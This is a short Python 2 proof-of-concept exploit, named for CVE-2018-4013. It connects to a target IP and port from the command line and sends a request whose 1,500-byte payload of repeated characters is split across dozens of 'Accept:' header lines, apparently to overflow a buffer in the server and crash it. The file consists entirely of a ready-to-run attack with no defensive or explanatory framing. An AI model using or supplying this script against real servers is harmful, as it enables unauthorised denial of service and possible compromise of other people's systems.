import socket
import sys
import re

def genHeader(raw):
    header = '''
GET / HTTP/1.1\r\n
Host: 127.0.0.1:8000\r\n
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\r\n
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3\r\n
Accept-Encoding: gzip, deflate\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
'''
    header += "Accept:"
    if len(raw) < 50:
        result = raw
    else:
        group = re.findall(r'.{50}',raw)
        result = "\r\nAccept:".join(group)
        if len(raw)%50:
            result += "\r\nAccept:" + raw[len(raw)-len(raw)%50:]
    header += result
    header +="\r\n\r\n"
    return header


def exploit(target,port,payload):
    sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    sock.connect((target,port))
    raw = genHeader(payload)
    # print raw
    sock.send(raw)
    # response = sock.recv(4096)

if __name__ == "__main__":
    if len(sys.argv)<3:
        print "usage: python cve-2018-4013.py IP PORT"
    else:
        payload = "a"*1500
        exploit(sys.argv[1],int(sys.argv[2]),payload)